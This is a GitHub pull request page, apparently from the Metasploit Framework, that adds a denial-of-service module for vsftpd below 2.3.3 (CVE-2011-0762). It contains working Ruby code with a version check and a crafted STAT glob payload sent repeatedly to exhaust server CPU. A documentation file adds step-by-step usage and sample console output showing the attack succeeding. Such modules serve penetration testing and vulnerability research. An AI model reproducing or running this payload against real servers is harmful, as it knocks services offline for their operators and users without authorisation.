Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2011-0762 VSFTPD DOS attack #18004

Merged
merged 22 commits into from
May 29, 2023
Merged

CVE-2011-0762 VSFTPD DOS attack #18004

Show file tree
Hide file tree
Changes from 12 commits
Commits
Show all changes
22 commits
Select commit Hold shift + click to select a range
6d676e9
Added vsftpd dos module
rad10 Nov 26, 2022
0e9060e
Added documentation for module
rad10 May 12, 2023
04e6bf8
Made stability involve service down
rad10 May 12, 2023
b7b1df2
Implemented threading into module
rad10 May 12, 2023
6a846c2
Added stub since stopping doesnt exist
rad10 May 17, 2023
10dd1b8
Updated scenarios for vsftpd_232
rad10 May 17, 2023
49e7c24
Fixed payload to properly function
rad10 May 17, 2023
9c888da
Reverted from threading as payload finally works
rad10 May 17, 2023
7751733
Made progress show in dots rather than status
rad10 May 17, 2023
ab0b8b8
Ran msftidy on module
rad10 May 17, 2023
62f48c5
Updated vsftpd_232 documentation
rad10 May 17, 2023
6882a7c
Shortened payload to be readable
rad10 May 17, 2023
0aee634
Put authors on separate lines
rad10 May 24, 2023
9c58289
Added container info in documentation
rad10 May 24, 2023
1c57019
Merge branch 'master' into vsftpd_232
rad10 May 24, 2023
1d98cb0
Added better description to documentation
rad10 May 25, 2023
b11b31c
Moved docker description into vulnerable application
rad10 May 25, 2023
cb8d866
Added build setup for arch linux
rad10 May 25, 2023
72ef653
Added tested versions to description
rad10 May 25, 2023
376ef7a
Made several fixes for msftidy
rad10 May 26, 2023
61c4ba7
Renamed module to correct name
rad10 May 26, 2023
1018ed1
Update documentation/modules/auxiliary/dos/ftp/vsftpd_232.md
jheysel-r7 May 29, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
35 changes: 35 additions & 0 deletions documentation/modules/auxiliary/dos/ftp/vsftpd_232.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
## Vulnerable Application

This is an auxiliary for DOSing a VSFTPD server from version 2.3.3 and below.

rad10 marked this conversation as resolved.
Show resolved Hide resolved
## Verification Steps

1. Start `msfconsole`
2. `use auxiliary/dos/ftp/vstfpd_232`
3. `set rhosts`
4. `set ftpuser`
5. `set ftppass`
6. `run`

## Scenarios

### VSFTPD 2.3.2 - Arch linux

```
msf6 > use auxiliary/dos/ftp/vsftpd_232
msf6 auxiliary(dos/ftp/vstfpd_232) > set rhosts 192.168.56.106
rhosts => 192.168.56.106
msf6 auxiliary(dos/ftp/vstfpd_232) > set ftpuser anonymous
ftpuser => anonymous
msf6 auxiliary(dos/ftp/vstfpd_232) > set ftppass ''
ftppass =>
msf6 auxiliary(dos/ftp/vstfpd_232) > run
[*] Running module against 192.168.56.106

[*] 192.168.56.106:21 - sending payload
.............................................................................................
[+] 192.168.56.106:21 - Stream was cut off abruptly. Appears DOS attack succeeded.
[*] Auxiliary module execution completed
```

You can verify that it works by either attempting to ftp into the machine after or checking htop on the machine. If the CPU is at max capacity, that would be due to the DOS.
103 changes: 103 additions & 0 deletions modules/auxiliary/dos/ftp/vstfpd_232.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VSFTPD 2.3.2 Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the VSFTPD server in versions before 2.3.3. So far, it has been tested on 2.3.2, but is reported to work on 2.3.0 as well.
},
'Author' => [ 'Nick Cottrell <ncottrellweb[at]gmail.com>', 'Anna Graterol <annagraterol95[at]gmail.com>', 'Mana Mostaani <mana.mostaani[at]gmail.com>' ],
rad10 marked this conversation as resolved.
Show resolved Hide resolved
'License' => MSF_LICENSE,
'References' => [
[ 'BID', '46617' ],
[ 'CVE', '2011-0762' ],
[ 'EDB', '16270' ]
],
'DisclosureDate' => '2011-02-03',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
end

def check
# attempt to connect
begin
if !connect_login
print_error('Connection refused.')
return Exploit::CheckCode::Unknown
end
rescue Rex::ConnectionRefused
print_error('Connection refused.')
return Exploit::CheckCode::Unknown
rescue Rex::ConnectionTimeout
print_error('Connection timed out')
return Exploit::CheckCode::Unknown
end
s = ''
loop do
# get each line until our desired line shows or end line shows
s = send_cmd(['STAT'], true)
break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
end
disconnect
# check if version was found
if s !~ /vsFTPd \d+\.\d+\.\d+/
print_error('Did not find ftp version in FTP session.')
return Exploit::CheckCode::Unknown
end

# pull out version and check if its in range of vulnerability
version = s[/\d+\.\d+\.\d+/]
if Rex::Version.new(version) < Rex::Version.new('2.3.3')
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def run
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears

payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487

vprint_status("Payload being sent: #{payload}")
print_status('sending payload')

loop do
print('.')
connect_login
10.times do
send_cmd([payload.to_s], false)
end
send_cmd([payload.to_s], true)
disconnect
rescue Rex::ConnectionTimeout
print("\n")
print_error('Connection timeout! Sending again')
rescue Errno::ECONNRESET
print("\n")
print_error('Connection reset!')
rescue Rex::ConnectionRefused
print("\n")
print_good('Connection refused! Appears DOS attack succeeded.')
rescue EOFError
print("\n")
print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')
break
end
disconnect
end
end